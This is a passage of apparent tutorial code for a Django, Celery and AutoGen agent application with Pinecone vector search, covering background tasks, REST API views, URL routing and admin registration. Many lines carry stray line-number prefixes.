from .utils.agent_factory import AgentFactory
from .utils.pinecone_client import PineconeClient

logger = logging.getLogger('agent_app')

@shared_task(bind=True,
             soft_time_limit=1800,  # 30 minute soft limit
             time_limit=1900,       # ~32 minute hard limit
             acks_late=True,        # Acknowledge task after execution
             retry_backoff=True,    # Applies to autoretry_for; the manual retry below uses a fixed countdown
             max_retries=3)         # Maximum retry attempts
def process_agent_task(self, task_id):
    """
    Process an agent task with the appropriate agent type.

    Args:
        task_id (str): UUID of the task to process

    Returns:
        dict: Result data
    """
    try:
        # Get task from database
        try:
            task = AgentTask.objects.get(id=task_id)
        except AgentTask.DoesNotExist:
            logger.error(f"Task {task_id} not found")
            return {"error": f"Task {task_id} not found"}

        # Update task status
        task.set_processing(self.request.id)
        logger.info(f"Processing task {task_id} of type {task.task_type}")

        # Initialize agent factory
        agent_factory = AgentFactory(user_id=task.user.id)

        # Process based on task type
        if task.task_type in ['research', 'analysis']:
            # Create a team of agents for complex tasks
            team = agent_factory.create_agent_team(task.input_data)
            result = process_team_task(team, task.input_data)
        else:
            # Create an individual agent
            agent_type = task.input_data.get('agent_type', 'generic')
            context = task.input_data.get('context', {})
            agent = agent_factory.create_agent(agent_type, context)

            # Process the task
            result = process_individual_task(agent, task.input_data)

        # Extract token usage
        token_usage = result.get('token_usage', {})

        # Update task as completed
        task.set_completed(result, token_usage)
        logger.info(f"Task {task_id} completed successfully")

        return result

    except SoftTimeLimitExceeded:
        # Handle timeout
        logger.error(f"Task {task_id} exceeded time limit")
        try:
            task = AgentTask.objects.get(id=task_id)
            task.set_failed("Task exceeded time limit")
        except Exception as e:
            logger.error(f"Error updating task: {str(e)}")

        return {"error": "Task exceeded time limit"}

    except Exception as e:
        # Handle other exceptions
        error_msg = str(e)
        stack_trace = traceback.format_exc()
        logger.error(f"Error processing task {task_id}: {error_msg}\n{stack_trace}")

        try:
            task = AgentTask.objects.get(id=task_id)
            task.set_failed(f"{error_msg}\n{stack_trace}")
        except Exception as e2:
            logger.error(f"Error updating task status: {str(e2)}")

        # Retry for transient errors (case-insensitive match on the message)
        lowered = error_msg.lower()
        if "rate limit" in lowered or "timeout" in lowered:
            raise self.retry(exc=e, countdown=60)

        return {"error": error_msg, "stack_trace": stack_trace}

def process_team_task(team, task_data):
    """
    Process a task using a team of agents.

    Args:
        team (dict): The team configuration with agents
        task_data (dict): Task data

    Returns:
        dict: Result data
    """
    start_time = time.time()

    # Extract team components
    user_proxy = team["user_proxy"]
    manager = team["manager"]

    # Prepare the task message
    task_description = task_data.get('description', '')
    task_details = task_data.get('details', {})

    message = f"Task: {task_description}\n\n"

    if task_details:
        message += "Details:\n"
        for key, value in task_details.items():
            message += f"- {key}: {value}\n"

    # Start the group conversation
    user_proxy.initiate_chat(
        manager,
        message=message
    )

    # Extract results. AutoGen 0.2-style agents keep per-peer histories in
    # `chat_messages`. Reading the manager's log for the coordinator keeps the
    # roles as this function expects: "user" = coordinator, "assistant" = team.
    chat_history = manager.chat_messages.get(user_proxy, [])
    result_content = None

    # Find the final result from the chat history
    # (content can be None for function-call messages, hence the `or ""`)
    for msg in reversed(chat_history):
        if msg.get("role") == "assistant" and len(msg.get("content") or "") > 100:
            result_content = msg.get("content")
            break

    # If no clear result is found, summarize the entire conversation
    if not result_content:
        result_content = "No clear result was produced. Here's the conversation summary:\n\n"
        for msg in chat_history:
            if msg.get("role") in ["assistant", "user"]:
                result_content += f"{msg.get('role').upper()}: {(msg.get('content') or '')[:200]}...\n\n"

    # Calculate token usage (rough estimate: ~1.3 tokens per whitespace-separated word)
    total_input_tokens = sum(len((msg.get("content") or "").split()) * 1.3 for msg in chat_history if msg.get("role") == "user")
    total_output_tokens = sum(len((msg.get("content") or "").split()) * 1.3 for msg in chat_history if msg.get("role") == "assistant")

    duration = time.time() - start_time

    return {
        "result": result_content,
        "chat_history": chat_history,
        "duration_seconds": duration,
        "team_composition": [agent.name for agent in team["agents"]],
        "token_usage": {
            "prompt_tokens": int(total_input_tokens),
            "completion_tokens": int(total_output_tokens),
            "total_tokens": int(total_input_tokens + total_output_tokens)
        }
    }

def process_individual_task(agent, task_data):
    """
    Process a task using an individual agent.

    Args:
        agent (AssistantAgent): The agent to process the task
        task_data (dict): Task data

    Returns:
        dict: Result data
    """
    start_time = time.time()

    # Create user proxy agent (requires `import autogen` at module level)
    user_proxy = autogen.UserProxyAgent(
        name="TaskUser",
        human_input_mode="NEVER",
        max_consecutive_auto_reply=0
    )

    # Prepare the task message
    query = task_data.get('query', '')
    context = task_data.get('context', {})

    message = query

    if context:
        message += "\n\nContext:\n"
        for key, value in context.items():
            message += f"- {key}: {value}\n"

    # Start conversation with agent
    user_proxy.initiate_chat(
        agent,
        message=message
    )

    # Get the last message from the agent as the result. AutoGen 0.2-style
    # agents keep per-peer histories in `chat_messages`; in the agent's own log
    # its replies carry the "assistant" role and the proxy's messages "user".
    chat_history = agent.chat_messages.get(user_proxy, [])
    result_content = None

    for msg in reversed(chat_history):
        if msg.get("role") == "assistant":
            result_content = msg.get("content")
            break

    # Calculate token usage (rough estimate: ~1.3 tokens per whitespace-separated word)
    total_input_tokens = sum(len((msg.get("content") or "").split()) * 1.3 for msg in chat_history if msg.get("role") == "user")
    total_output_tokens = sum(len((msg.get("content") or "").split()) * 1.3 for msg in chat_history if msg.get("role") == "assistant")

    duration = time.time() - start_time

    return {
        "result": result_content,
        "chat_history": chat_history,
        "duration_seconds": duration,
        "agent_type": agent.name,
        "token_usage": {
            "prompt_tokens": int(total_input_tokens),
            "completion_tokens": int(total_output_tokens),
            "total_tokens": int(total_input_tokens + total_output_tokens)
        }
    }

232@shared_task(bind=True,
233 soft_time_limit=300, # 5 minute soft limit
234 acks_late=True,
235 max_retries=2)
236def update_knowledge_base(self, knowledge_item_id):
237 """
238 Update a knowledge item in the vector database.
239
240 Args:
241 knowledge_item_id (str): UUID of the knowledge item to update
242
243 Returns:
244 dict: Result status
245 """
246 try:
247 # Get knowledge item from database
248 try:
249 item = KnowledgeItem.objects.get(id=knowledge_item_id)
250 except KnowledgeItem.DoesNotExist:
251 logger.error(f"Knowledge item {knowledge_item_id} not found")
252 return {"error": f"Knowledge item {knowledge_item_id} not found"}
253
254 logger.info(f"Updating knowledge item {knowledge_item_id} in vector database")
255
256 # Initialize Pinecone client
257 pinecone_client = PineconeClient()
258
259 # Prepare metadata
260 metadata = {
261 "user_id": str(item.user.id),
262 "title": item.title,
263 "source": item.source,
264 "domain": item.domain,
265 "tags": json.dumps(item.tags),
266 "confidence": item.confidence,
267 "created_at": item.created_at.isoformat()
268 }
269
270 # Update or create vector
271 if item.vector_id:
272 # Update existing vector
273 success = pinecone_client.update_metadata(item.vector_id, metadata)
274 if not success:
275 # If update failed, create new vector
276 vector_id = pinecone_client.add_item(
277 str(item.id),
278 item.content,
279 metadata
280 )
281 item.vector_id = vector_id
282 item.save(update_fields=['vector_id', 'last_updated'])
283 else:
284 # Create new vector
285 vector_id = pinecone_client.add_item(
286 str(item.id),
287 item.content,
288 metadata
289 )
290 item.vector_id = vector_id
291 item.save(update_fields=['vector_id', 'last_updated'])
292
293 logger.info(f"Knowledge item {knowledge_item_id} updated successfully")
294
295 return {
296 "status": "success",
297 "message": f"Knowledge item {knowledge_item_id} updated",
298 "vector_id": item.vector_id
299 }
300
301 except Exception as e:
302 error_msg = str(e)
303 stack_trace = traceback.format_exc()
304 logger.error(f"Error updating knowledge item {knowledge_item_id}: {error_msg}\n{stack_trace}")
305
306 # Retry for certain exceptions
307 if "Rate limit" in error_msg or "timeout" in error_msg.lower():
308 raise self.retry(exc=e, countdown=30)
309
310 return {"error": error_msg, "stack_trace": stack_trace}
311
312@shared_task(bind=True,
313 soft_time_limit=600, # 10 minute soft limit
314 acks_late=True,
315 max_retries=2)
316def analyze_document(self, task_id):
317 """
318 Analyze a document using a document processor agent.
319
320 Args:
321 task_id (str): UUID of the task to process
322
323 Returns:
324 dict: Analysis results
325 """
326 try:
327 # Get task from database
328 try:
329 task = AgentTask.objects.get(id=task_id)
330 except AgentTask.DoesNotExist:
331 logger.error(f"Task {task_id} not found")
332 return {"error": f"Task {task_id} not found"}
333
334 # Update task status
335 task.set_processing(self.request.id)
336 logger.info(f"Analyzing document for task {task_id}")
337
338 # Initialize agent factory
339 agent_factory = AgentFactory(user_id=task.user.id)
340
341 # Create document processor agent
342 context = {
343 "document_type": task.input_data.get("document_type", "general")
344 }
345 agent = agent_factory.create_agent("document_processor", context)
346
347 # Extract document text
348 document_text = task.input_data.get("document", "")
349 if not document_text:
350 raise ValueError("No document text provided")
351
352 # Create user proxy agent
353 user_proxy = autogen.UserProxyAgent(
354 name="DocumentUser",
355 human_input_mode="NEVER",
356 max_consecutive_auto_reply=0
357 )
358
359 # Prepare analysis instructions
360 analysis_type = task.input_data.get("analysis_type", "general")
361
362 instructions = f"""Analyze the following document.
363
364Document type: {context.get('document_type', 'general')}
365Analysis type: {analysis_type}
366
367Please provide:
3681. A concise summary of the document
3692. Key entities and topics mentioned
3703. Main points or arguments presented
3714. Any notable insights or implications
372
Document text:
{document_text[:8000]}
"""

        # Only the first 8000 characters are sent, to stay within token limits
        if len(document_text) > 8000:
            instructions += "\n\n[Note: Document has been truncated due to length. Analysis based on first portion only.]"
379
380 # Start conversation with agent
381 user_proxy.initiate_chat(
382 agent,
383 message=instructions
384 )
385
        # Get the analysis result from the assistant's side of the transcript,
        # where its own replies carry role "assistant"
        # (assumes pyautogen 0.2.x, where agents expose `chat_messages`)
        chat_history = agent.chat_messages[user_proxy]
        analysis_result = None

        for msg in reversed(chat_history):
            if msg.get("role") == "assistant":
                analysis_result = msg.get("content")
                break

        # Calculate token usage (estimated at ~1.3 tokens per word; content may be None)
        total_input_tokens = sum(len((msg.get("content") or "").split()) * 1.3 for msg in chat_history if msg.get("role") == "user")
        total_output_tokens = sum(len((msg.get("content") or "").split()) * 1.3 for msg in chat_history if msg.get("role") == "assistant")
398
399 # Prepare result data
400 result = {
401 "analysis": analysis_result,
402 "document_type": context.get("document_type"),
403 "analysis_type": analysis_type,
404 "character_count": len(document_text),
405 "token_usage": {
406 "prompt_tokens": int(total_input_tokens),
407 "completion_tokens": int(total_output_tokens),
408 "total_tokens": int(total_input_tokens + total_output_tokens)
409 }
410 }
411
412 # Update task as completed
413 task.set_completed(result, result["token_usage"])
414 logger.info(f"Document analysis for task {task_id} completed")
415
416 return result
417
418 except Exception as e:
419 error_msg = str(e)
420 stack_trace = traceback.format_exc()
421 logger.error(f"Error analyzing document for task {task_id}: {error_msg}\n{stack_trace}")
422
423 try:
424 task = AgentTask.objects.get(id=task_id)
425 task.set_failed(f"{error_msg}\n{stack_trace}")
426 except Exception as e2:
427 logger.error(f"Error updating task status: {str(e2)}")
428
429 return {"error": error_msg, "stack_trace": stack_trace}
430
431@shared_task(bind=True)
432def periodic_agent_check(self):
433 """
434 Periodic task to check for stalled agent tasks.
435 """
436 try:
437 # Find tasks that have been processing for too long (1 hour)
438 one_hour_ago = timezone.now() - timezone.timedelta(hours=1)
439 stalled_tasks = AgentTask.objects.filter(
440 status='processing',
441 started_at__lt=one_hour_ago
442 )
443
444 count = stalled_tasks.count()
445 logger.info(f"Found {count} stalled tasks")
446
447 # Mark tasks as failed
448 for task in stalled_tasks:
449 task.set_failed("Task stalled - processing timeout exceeded")
450 logger.warning(f"Marked task {task.id} as failed due to processing timeout")
451
452 return {"status": "success", "stalled_tasks_count": count}
453
454 except Exception as e:
455 logger.error(f"Error in periodic agent check: {str(e)}")
456 return {"status": "error", "message": str(e)}
457
458@shared_task(bind=True)
459def process_conversation(self, conversation_id, message_id):
460 """
461 Process a new message in a conversation.
462
463 Args:
464 conversation_id (str): UUID of the conversation
465 message_id (str): UUID of the message to process
466
467 Returns:
468 dict: Response data
469 """
470 try:
471 # Get conversation and message from database
472 try:
473 conversation = Conversation.objects.get(id=conversation_id)
474 message = Message.objects.get(id=message_id, conversation=conversation)
475 except (Conversation.DoesNotExist, Message.DoesNotExist):
476 logger.error(f"Conversation {conversation_id} or message {message_id} not found")
477 return {"error": "Conversation or message not found"}
478
479 logger.info(f"Processing message {message_id} in conversation {conversation_id}")
480
481 # Initialize agent factory
482 agent_factory = AgentFactory(user_id=conversation.user.id)
483
484 # Create conversation agent
485 context = {
486 "topic": conversation.topic,
487 "tone": "conversational"
488 }
489 agent = agent_factory.create_agent("conversation", context)
490
        # Get conversation history: the 10 most recent messages, oldest first
        history = list(conversation.messages.order_by('-created_at')[:10])[::-1]

        # Prepare conversation context
        conversation_context = ""
        for hist_msg in history:
            if hist_msg.id != message.id:  # Skip the current message
                conversation_context += f"{hist_msg.role.upper()}: {hist_msg.content}\n\n"
499
500 # Create user proxy agent
501 user_proxy = autogen.UserProxyAgent(
502 name="ConversationUser",
503 human_input_mode="NEVER",
504 max_consecutive_auto_reply=0
505 )
506
507 # Prepare the message with context
508 prompt = f"""This is part of an ongoing conversation. Please respond to the latest message.
509
510Previous conversation:
511{conversation_context}
512
513Current message:
514USER: {message.content}
515
516Please respond in a helpful, conversational manner."""
517
518 # Start conversation with agent
519 user_proxy.initiate_chat(
520 agent,
521 message=prompt
522 )
523
        # Get the response from the assistant's side of the transcript,
        # where its own replies carry role "assistant"
        # (assumes pyautogen 0.2.x, where agents expose `chat_messages`)
        chat_history = agent.chat_messages[user_proxy]
        response_content = None

        for msg in reversed(chat_history):
            if msg.get("role") == "assistant":
                response_content = msg.get("content")
                break

        if response_content:
            # Create response message
            response = Message.objects.create(
                conversation=conversation,
                role="assistant",
                content=response_content,
                agent_name=agent.name,
                token_count=int(len(response_content.split()) * 1.3)  # Approximate token count
            )
542
543 # Update conversation
544 conversation.updated_at = timezone.now()
545 conversation.save(update_fields=['updated_at'])
546
547 logger.info(f"Created response message {response.id} in conversation {conversation_id}")
548
549 # Calculate token usage (estimated)
550 total_input_tokens = sum(len(msg.get("content", "").split()) * 1.3 for msg in chat_history if msg.get("role") == "user")
551 total_output_tokens = sum(len(msg.get("content", "").split()) * 1.3 for msg in chat_history if msg.get("role") == "assistant")
552
553 return {
554 "status": "success",
555 "response_id": str(response.id),
556 "response_content": response_content,
557 "token_usage": {
558 "prompt_tokens": int(total_input_tokens),
559 "completion_tokens": int(total_output_tokens),
560 "total_tokens": int(total_input_tokens + total_output_tokens)
561 }
562 }
563 else:
564 logger.error(f"No response generated for message {message_id}")
565 return {"error": "No response generated"}
566
567 except Exception as e:
568 error_msg = str(e)
569 stack_trace = traceback.format_exc()
570 logger.error(f"Error processing conversation message: {error_msg}\n{stack_trace}")
571
572 return {"error": error_msg, "stack_trace": stack_trace}
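
The tasks above repeat the same word-count heuristic (about 1.3 tokens per word) in several places. One way to keep it consistent is to factor it into a single helper. The following is a minimal sketch, not part of the original code: `count_words` and `estimate_usage` are hypothetical names, and the 1.3 ratio is the same rough approximation used above rather than a tokenizer-accurate count.

```python
TOKENS_PER_WORD = 1.3  # rough heuristic carried over from the tasks above


def count_words(chat_history, role):
    """Count whitespace-separated words in all messages with the given role."""
    return sum(
        len((msg.get("content") or "").split())  # content may be None
        for msg in chat_history
        if msg.get("role") == role
    )


def estimate_usage(chat_history):
    """Build a token_usage dict from a list of {"role", "content"} messages."""
    prompt = int(count_words(chat_history, "user") * TOKENS_PER_WORD)
    completion = int(count_words(chat_history, "assistant") * TOKENS_PER_WORD)
    return {
        "prompt_tokens": prompt,
        "completion_tokens": completion,
        "total_tokens": prompt + completion,
    }


history = [
    {"role": "user", "content": "one two three four five six seven eight nine ten"},
    {"role": "assistant", "content": "ok done"},
    {"role": "assistant", "content": None},
]
usage = estimate_usage(history)
```

If exact counts matter for billing, a real tokenizer for the model in use would replace `TOKENS_PER_WORD`; the dict shape stays the same.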

Now, let's implement the API views:

python
1# agent_app/views.py
2import uuid
3import logging
4from django.shortcuts import get_object_or_404
5from django.utils import timezone
6from django.db.models import Count, Sum, Max, F, ExpressionWrapper, fields
7from django.db.models.functions import TruncDay
8from rest_framework import viewsets, status, permissions
9from rest_framework.decorators import action
10from rest_framework.response import Response
11from rest_framework.views import APIView
12from .models import AgentTask, KnowledgeItem, Conversation, Message
13from .serializers import (
14 AgentTaskSerializer, KnowledgeItemSerializer,
15 ConversationSerializer, MessageSerializer,
16 ConversationMessageSerializer
17)
18from .tasks import (
19 process_agent_task, update_knowledge_base,
20 analyze_document, process_conversation
21)
22from .utils.pinecone_client import PineconeClient
23
24logger = logging.getLogger('agent_app')
25
26class AgentTaskViewSet(viewsets.ModelViewSet):
27 """ViewSet for managing agent tasks."""
28 serializer_class = AgentTaskSerializer
29 permission_classes = [permissions.IsAuthenticated]
30
31 def get_queryset(self):
32 """Return tasks for the current user."""
33 return AgentTask.objects.filter(user=self.request.user).order_by('-created_at')
34
35 def create(self, request, *args, **kwargs):
36 """Create a new task and queue it for processing."""
37 serializer = self.get_serializer(data=request.data)
38 serializer.is_valid(raise_exception=True)
39 task = serializer.save()
40
41 # Queue the task for processing based on type
42 if task.task_type == 'document':
43 # Use document-specific task
44 result = analyze_document.delay(str(task.id))
45 else:
46 # Use general task processing
47 result = process_agent_task.delay(str(task.id))
48
49 # Update task with celery task ID
50 task.celery_task_id = result.id
51 task.save(update_fields=['celery_task_id'])
52
53 headers = self.get_success_headers(serializer.data)
54 return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
55
56 @action(detail=True, methods=['post'])
57 def cancel(self, request, pk=None):
58 """Cancel a running task."""
59 task = self.get_object()
60
61 if task.status not in ['pending', 'processing']:
62 return Response(
63 {"detail": "Only pending or processing tasks can be canceled."},
64 status=status.HTTP_400_BAD_REQUEST
65 )
66
67 # Update task status
68 task.status = 'canceled'
69 task.completed_at = timezone.now()
70 task.save(update_fields=['status', 'completed_at', 'updated_at'])
71
72 # Could also revoke the Celery task here
73
74 return Response({"detail": "Task canceled successfully."})
75
76 @action(detail=False, methods=['get'])
77 def stats(self, request):
78 """Get statistics about tasks."""
79 queryset = self.get_queryset()
80
81 # Basic counts
82 total_tasks = queryset.count()
83 completed_tasks = queryset.filter(status='completed').count()
84 failed_tasks = queryset.filter(status='failed').count()
85
86 # Token usage statistics
87 token_stats = queryset.filter(status='completed').aggregate(
88 total_prompt_tokens=Sum('prompt_tokens'),
89 total_completion_tokens=Sum('completion_tokens'),
90 total_tokens=Sum('total_tokens'),
91 avg_tokens_per_task=ExpressionWrapper(
92 Sum('total_tokens') * 1.0 / Count('id'),
93 output_field=fields.FloatField()
94 ),
95 total_cost=Sum('estimated_cost')
96 )
97
98 # Task type distribution
99 type_distribution = (
100 queryset
101 .values('task_type')
102 .annotate(count=Count('id'))
103 .order_by('-count')
104 )
105
106 # Task creation over time (last 30 days)
107 thirty_days_ago = timezone.now() - timezone.timedelta(days=30)
108 time_series = (
109 queryset
110 .filter(created_at__gte=thirty_days_ago)
111 .annotate(day=TruncDay('created_at'))
112 .values('day')
113 .annotate(count=Count('id'))
114 .order_by('day')
115 )
116
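        # Average processing time. aggregate() only accepts aggregate
        # expressions, so sum the per-task durations in the database and
        # divide by the row count in Python.
        totals = queryset.filter(
            status='completed',
            started_at__isnull=False,
            completed_at__isnull=False
        ).aggregate(
            total_duration=Sum(
                ExpressionWrapper(
                    F('completed_at') - F('started_at'),
                    output_field=fields.DurationField()
                )
            ),
            task_count=Count('id')
        )
        avg_seconds = None
        if totals['task_count']:
            avg_seconds = totals['total_duration'].total_seconds() / totals['task_count']
        time_stats = {"avg_processing_time": avg_seconds}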
128
129 return Response({
130 "total_tasks": total_tasks,
131 "completed_tasks": completed_tasks,
132 "failed_tasks": failed_tasks,
133 "token_stats": token_stats,
134 "type_distribution": type_distribution,
135 "time_series": time_series,
136 "time_stats": time_stats
137 })
138
139class KnowledgeItemViewSet(viewsets.ModelViewSet):
140 """ViewSet for managing knowledge items."""
141 serializer_class = KnowledgeItemSerializer
142 permission_classes = [permissions.IsAuthenticated]
143
144 def get_queryset(self):
145 """Return knowledge items for the current user."""
146 return KnowledgeItem.objects.filter(user=self.request.user).order_by('-created_at')
147
148 def create(self, request, *args, **kwargs):
149 """Create a new knowledge item and index it."""
150 serializer = self.get_serializer(data=request.data)
151 serializer.is_valid(raise_exception=True)
152 item = serializer.save()
153
154 # Queue indexing task
155 update_knowledge_base.delay(str(item.id))
156
157 headers = self.get_success_headers(serializer.data)
158 return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
159
160 def update(self, request, *args, **kwargs):
161 """Update a knowledge item and re-index it."""
162 partial = kwargs.pop('partial', False)
163 instance = self.get_object()
164 serializer = self.get_serializer(instance, data=request.data, partial=partial)
165 serializer.is_valid(raise_exception=True)
166 item = serializer.save()
167
168 # Queue indexing task
169 update_knowledge_base.delay(str(item.id))
170
171 return Response(serializer.data)
172
173 def destroy(self, request, *args, **kwargs):
174 """Delete a knowledge item and remove from index."""
175 instance = self.get_object()
176
177 # If it has a vector ID, remove from Pinecone
178 if instance.vector_id:
179 try:
180 pinecone_client = PineconeClient()
181 pinecone_client.delete_item(instance.vector_id)
182 except Exception as e:
183 logger.error(f"Error removing item from Pinecone: {str(e)}")
184
185 self.perform_destroy(instance)
186 return Response(status=status.HTTP_204_NO_CONTENT)
187
188 @action(detail=False, methods=['post'])
189 def search(self, request):
190 """Search knowledge items by semantic similarity."""
191 query = request.data.get('query')
192 if not query:
193 return Response(
194 {"detail": "Query is required."},
195 status=status.HTTP_400_BAD_REQUEST
196 )
197
198 filters = request.data.get('filters', {})
199 top_k = int(request.data.get('limit', 5))
200
201 # Add user filter
202 filters["user_id"] = str(request.user.id)
203
204 try:
205 pinecone_client = PineconeClient()
206 results = pinecone_client.search(query, filters, top_k)
207
208 # Get item IDs from results
209 item_ids = [result['id'] for result in results]
210
211 # Fetch full items from database
212 items = KnowledgeItem.objects.filter(id__in=item_ids)
213 item_dict = {str(item.id): item for item in items}
214
215 # Combine database items with search results
216 enriched_results = []
217 for result in results:
218 item = item_dict.get(result['id'])
219 if item:
220 enriched_results.append({
221 "id": str(item.id),
222 "title": item.title,
223 "content": item.content,
224 "domain": item.domain,
225 "tags": item.tags,
226 "source": item.source,
227 "created_at": item.created_at.isoformat(),
228 "relevance_score": result['score']
229 })
230
231 return Response({
232 "results": enriched_results,
233 "count": len(enriched_results),
234 "query": query
235 })
236
237 except Exception as e:
238 logger.error(f"Error searching knowledge: {str(e)}")
239 return Response(
240 {"detail": f"Search error: {str(e)}"},
241 status=status.HTTP_500_INTERNAL_SERVER_ERROR
242 )
243
244class ConversationViewSet(viewsets.ModelViewSet):
245 """ViewSet for managing conversations."""
246 serializer_class = ConversationSerializer
247 permission_classes = [permissions.IsAuthenticated]
248
249 def get_queryset(self):
250 """Return conversations for the current user."""
251 queryset = Conversation.objects.filter(
252 user=self.request.user
253 ).order_by('-updated_at')
254
255 # Filter by active status if specified
256 is_active = self.request.query_params.get('is_active')
257 if is_active is not None:
258 is_active = is_active.lower() == 'true'
259 queryset = queryset.filter(is_active=is_active)
260
261 # Filter by topic if specified
262 topic = self.request.query_params.get('topic')
263 if topic:
264 queryset = queryset.filter(topic=topic)
265
266 return queryset
267
268 @action(detail=True, methods=['post'])
269 def add_message(self, request, pk=None):
270 """Add a new message to the conversation and get a response."""
271 conversation = self.get_object()
272
273 serializer = ConversationMessageSerializer(data=request.data)
274 serializer.is_valid(raise_exception=True)
275
        # Create the message
        content = serializer.validated_data['content']
        message = Message.objects.create(
            conversation=conversation,
            role=serializer.validated_data.get('role', 'user'),
            content=content,
            token_count=int(len(content.split()) * 1.3)  # Approximate token count
        )
283
284 # Update conversation timestamp
285 conversation.updated_at = timezone.now()
286 conversation.save(update_fields=['updated_at'])
287
288 # Queue task to process the message if it's from the user
289 if message.role == 'user':
290 process_conversation.delay(str(conversation.id), str(message.id))
291
292 # Return the created message
293 message_serializer = MessageSerializer(message)
294
295 return Response({
296 "message": message_serializer.data,
297 "status": "processing" if message.role == 'user' else "completed"
298 })
299
300 @action(detail=True, methods=['get'])
301 def messages(self, request, pk=None):
302 """Get messages for a conversation with pagination."""
303 conversation = self.get_object()
304
305 # Get messages with pagination
306 messages = conversation.messages.order_by('created_at')
307
308 # Get page parameters
309 page = self.paginate_queryset(messages)
310 if page is not None:
311 serializer = MessageSerializer(page, many=True)
312 return self.get_paginated_response(serializer.data)
313
314 serializer = MessageSerializer(messages, many=True)
315 return Response(serializer.data)
316
317 @action(detail=True, methods=['post'])
318 def archive(self, request, pk=None):
319 """Archive a conversation (mark as inactive)."""
320 conversation = self.get_object()
321 conversation.is_active = False
322 conversation.save(update_fields=['is_active', 'updated_at'])
323
324 return Response({"status": "success", "detail": "Conversation archived"})
325
326class MessageViewSet(viewsets.ReadOnlyModelViewSet):
327 """ViewSet for reading messages (no direct creation/update)."""
328 serializer_class = MessageSerializer
329 permission_classes = [permissions.IsAuthenticated]
330
331 def get_queryset(self):
332 """Return messages that belong to the current user's conversations."""
333 return Message.objects.filter(
334 conversation__user=self.request.user
335 ).order_by('created_at')
336
337 def list(self, request, *args, **kwargs):
338 """Messages must be accessed through a conversation."""
339 return Response(
340 {"detail": "Messages must be accessed through a specific conversation."},
341 status=status.HTTP_400_BAD_REQUEST
342 )
343
344class VectorDatabaseStatsView(APIView):
345 """View for getting vector database statistics."""
346 permission_classes = [permissions.IsAuthenticated]
347
348 def get(self, request, format=None):
349 """Get statistics about the vector database."""
350 try:
351 pinecone_client = PineconeClient()
352 stats = pinecone_client.get_stats()
353
354 # Get count of user's knowledge items
355 user_items_count = KnowledgeItem.objects.filter(
356 user=request.user,
357 vector_id__isnull=False
358 ).count()
359
360 return Response({
361 "user_items_count": user_items_count,
362 "total_vectors": stats.get("total_vector_count", 0),
363 "dimension": stats.get("dimension", 0),
364 "namespaces": stats.get("namespaces", {})
365 })
366
367 except Exception as e:
368 logger.error(f"Error getting vector database stats: {str(e)}")
369 return Response(
370 {"detail": f"Error: {str(e)}"},
371 status=status.HTTP_500_INTERNAL_SERVER_ERROR
372 )

Next, register the views with the URL router:

python
1# agent_app/urls.py
2from django.urls import path, include
3from rest_framework.routers import DefaultRouter
4from . import views
5
6router = DefaultRouter()
7router.register(r'tasks', views.AgentTaskViewSet, basename='task')
8router.register(r'knowledge', views.KnowledgeItemViewSet, basename='knowledge')
9router.register(r'conversations', views.ConversationViewSet, basename='conversation')
10router.register(r'messages', views.MessageViewSet, basename='message')
11
12urlpatterns = [
13 path('', include(router.urls)),
14 path('vector-stats/', views.VectorDatabaseStatsView.as_view(), name='vector-stats'),
15]
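
With this router in place, DRF's `DefaultRouter` exposes list and detail routes for each registered prefix, plus one route per `@action` named after the method. The sketch below builds a few requests against those routes using only the standard library, without sending them. The base URL `http://localhost:8000/api/`, the `Token` authorization header, the placeholder IDs, and the task payload fields are all assumptions; the mount point, authentication scheme, and serializer fields depend on project code not shown here.

```python
import json
from urllib.parse import urljoin
from urllib.request import Request

BASE_URL = "http://localhost:8000/api/"  # assumed mount point for agent_app.urls


def build_request(path, method="GET", payload=None, token="YOUR_TOKEN"):
    """Build a JSON request for one of the agent_app routes without sending it."""
    data = json.dumps(payload).encode("utf-8") if payload is not None else None
    return Request(
        urljoin(BASE_URL, path),
        data=data,
        method=method,
        headers={
            "Content-Type": "application/json",
            "Authorization": f"Token {token}",  # assumed auth scheme
        },
    )


# Placeholder identifiers for illustration only
task_id = "00000000-0000-0000-0000-000000000001"
conversation_id = "00000000-0000-0000-0000-000000000002"

# Field names in this payload are assumed from the AgentTask model
create_task = build_request(
    "tasks/", "POST", {"title": "Summarize report", "task_type": "document"}
)
cancel_task = build_request(f"tasks/{task_id}/cancel/", "POST")
task_stats = build_request("tasks/stats/")
search = build_request(
    "knowledge/search/", "POST", {"query": "vector databases", "limit": 3}
)
add_message = build_request(
    f"conversations/{conversation_id}/add_message/", "POST", {"content": "Hello"}
)
```

Passing any of these objects to `urllib.request.urlopen` sends the request. Because `add_message` only queues the reply, a client would then poll the conversation's `messages/` route for the assistant's response.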

Finally, let's create the admin interface:

python
1# agent_app/admin.py
2from django.contrib import admin
3from .models import AgentTask, KnowledgeItem, Conversation, Message
4
5@admin.register(AgentTask)
6class AgentTaskAdmin(admin.ModelAdmin):
7 list_display = ('id', 'title', 'user', 'task_type', 'status', 'priority', 'created_at')
8 list_filter = ('status', 'task_type', 'priority')
9 search_fields = ('title', 'description', 'user__username')
10 readonly_fields = ('created_at', 'updated_at', 'started_at', 'completed_at', 'celery_task_id')
11 date_hierarchy = 'created_at'
12
13@admin.register(KnowledgeItem)
14class KnowledgeItemAdmin(admin.ModelAdmin):
15 list_display = ('id', 'title', 'user', 'domain', 'created_at')
16 list_filter = ('domain',)
17 search_fields = ('title', 'content', 'user__username')
18 readonly_fields = ('created_at', 'vector_id', 'last_updated')
19
20@admin.register(Conversation)
21class ConversationAdmin(admin.ModelAdmin):
22 list_display = ('id', 'title', 'user', 'topic', 'is_active', 'created_at', 'updated_at')
23 list_filter = ('is_active', 'topic')
24 search_fields = ('title', 'user__username')
25 readonly_fields = ('created_at', 'updated_at')
26
27@admin.register(Message)
28class MessageAdmin(admin.ModelAdmin):
29 list_display = ('id', 'conversation', 'role', 'token_count', 'created_at')
30 list_filter = ('role',)
31 search_fields = ('content', 'conversation__title')
32 readonly_fields = ('created_at',)

Key Advantages:

  1. Task Orchestration: Celery provides robust task queuing and scheduling for asynchronous agent operations
  2. Persistence: Django models provide structured data storage with proper relationships
  3. Scalability: Tasks can be distributed across multiple workers
  4. Semantic Search: Pinecone enables fast vector search for knowledge retrieval
  5. Easy API Development: Django REST Framework provides a clean API interface
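
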